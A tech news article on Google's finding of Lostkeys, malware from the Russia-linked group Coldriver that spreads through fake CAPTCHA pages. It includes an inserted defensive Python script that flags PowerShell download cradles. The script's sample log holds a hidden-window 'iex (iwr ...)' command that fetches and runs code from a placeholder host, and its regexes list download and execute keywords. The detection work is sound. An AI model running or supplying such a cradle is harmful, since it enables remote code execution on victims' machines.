Google finds new malware from Russia-backed hacking group: What it can do and how to stay safe

Updated on 08-May-2025
HIGHLIGHTS

Lostkeys is delivered through fake CAPTCHA pages, tricking users into executing commands.

The malware targets high-profile individuals, including government officials and journalists.

Google has added the threat to Safe Browsing and advised users to enable Enhanced Safe Browsing for protection.

Google’s Threat Intelligence Group (GTIG) has found a new malware strain named Lostkeys, linked to the Russian government-backed hacking group Coldriver, also known as UNC4057, Star Blizzard, and Callisto. According to Google, Lostkeys is capable of stealing files from the targeted device and transmitting system information to the attackers.

The malware was observed in campaigns carried out in January, March and April 2025, pointing to a significant escalation in Coldriver’s operations. Previously known for credential phishing against NATO governments, non-governmental organizations (NGOs), and former intelligence officials, the group has now expanded into deploying malware for direct data theft.

How does Lostkeys work?

Lostkeys is delivered via a multi-stage infection chain that starts with a fake CAPTCHA page tricking the user into running PowerShell commands. Those commands fetch further malware stages from a remote server, ultimately deploying Lostkeys, which can steal files from specified directories and file extensions, collect and send system information and the list of running processes to the attackers, and evade detection through device-specific checks, such as refusing to run on virtual machines.
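The chain described above leaves a recognisable trace on the endpoint: PowerShell started from the user's desktop shell with a command line that pulls and runs code from a remote host. The script below is an added defensive example, not code from Google or from the article, that scores constructed process-creation events for that pattern. The log format (one JSON object per line with "parent", "image" and "cmdline" fields), the sample events and the placeholder host `placeholder.invalid` are all assumptions made for this example; the heuristics are generic PowerShell abuse indicators and are not specific to Lostkeys.

```python
"""Triage process-creation events for the fake-CAPTCHA -> PowerShell pattern.

Added example, not from the article or from Google. Assumes each log line is a
JSON object with "parent", "image" and "cmdline" keys (field names invented
for this example; map them from your EDR/Sysmon export as needed).
"""
import json
import re

# Heuristics a defender would look for; none is specific to Lostkeys.
INTERACTIVE_PARENTS = {"explorer.exe"}  # user pasted it into Run / a console
DOWNLOAD_CRADLES = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Net\.WebClient|Start-BitsTransfer|\bcurl\b)",
    re.IGNORECASE,
)
EXEC_FROM_STRING = re.compile(r"(\biex\b|Invoke-Expression)", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)
HIDING_FLAGS = re.compile(
    r"-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass",
    re.IGNORECASE,
)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event: dict) -> list[str]:
    """Return the list of reasons an event looks like a paste-and-run cradle."""
    reasons = []
    if _basename(event.get("image", "")) not in POWERSHELL_IMAGES:
        return reasons
    parent = _basename(event.get("parent", ""))
    cmd = event.get("cmdline", "")
    if parent in INTERACTIVE_PARENTS:
        reasons.append("powershell launched interactively from " + parent)
    if DOWNLOAD_CRADLES.search(cmd):
        reasons.append("download cradle in command line")
    if EXEC_FROM_STRING.search(cmd):
        reasons.append("executes code from a string")
    if ENCODED_FLAG.search(cmd):
        reasons.append("encoded command")
    if HIDING_FLAGS.search(cmd):
        reasons.append("window-hiding or policy-bypass flags")
    return reasons


def triage(lines, threshold: int = 2):
    """Return [(line_no, reasons)] for events with at least `threshold` reasons.

    Malformed (non-JSON) lines are skipped rather than aborting the run.
    """
    hits = []
    for line_no, line in enumerate(lines, 1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        reasons = score_event(event)
        if len(reasons) >= threshold:
            hits.append((line_no, reasons))
    return hits


# Constructed sample log: benign shells, one paste-and-run cradle, one junk line.
SAMPLE_LOG_LINES = r'''
{"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe"}
{"parent": "C:\\Program Files\\IDE\\devenv.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoProfile -File build.ps1"}
{"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -w hidden -nop -c \"iex (iwr http://placeholder.invalid/stage1)\""}
{"parent": "C:\\Windows\\System32\\services.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -EncodedCommand SQBFAFgA"}
this line is not JSON and is skipped
'''.strip().splitlines()


if __name__ == "__main__":
    for line_no, reasons in triage(SAMPLE_LOG_LINES):
        print(f"line {line_no}: " + "; ".join(reasons))
```

With the default threshold of two indicators only the pasted cradle on line 3 is reported; a developer's `-NoProfile -File build.ps1` and a plain interactive shell each score one indicator and stay quiet. Tune `threshold` and the indicator sets to your environment's baseline rather than treating any single flag as malicious.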

Google has warned that the group targets high-profile individuals including government officials, journalists, think tanks and NGOs. It added that the group has also targeted individuals connected to Ukraine.

“Coldriver typically targets high-profile individuals at their personal email addresses or at NGO addresses. They are known for stealing credentials and after gaining access to a target’s account they exfiltrate emails and steal contact lists from the compromised account. In select cases, Coldriver also delivers malware to target devices and may attempt to access files on the system,” the company stated in its blog post. 

Google has taken steps to mitigate the threat by adding the identified malicious websites, domains, and files to Google Safe Browsing. The company has also advised users, particularly those at high risk, to enroll in the Advanced Protection Program and enable Enhanced Safe Browsing in Chrome.

Ashish Singh

Ashish Singh is the Chief Copy Editor at Digit. He's been wrangling tech jargon since 2020 (Times Internet, Jagran English '22). When not policing commas, he's likely fueling his gadget habit with coffee, strategising his next virtual race, or plotting a road trip to test the latest in-car tech. He speaks fluent Geek.
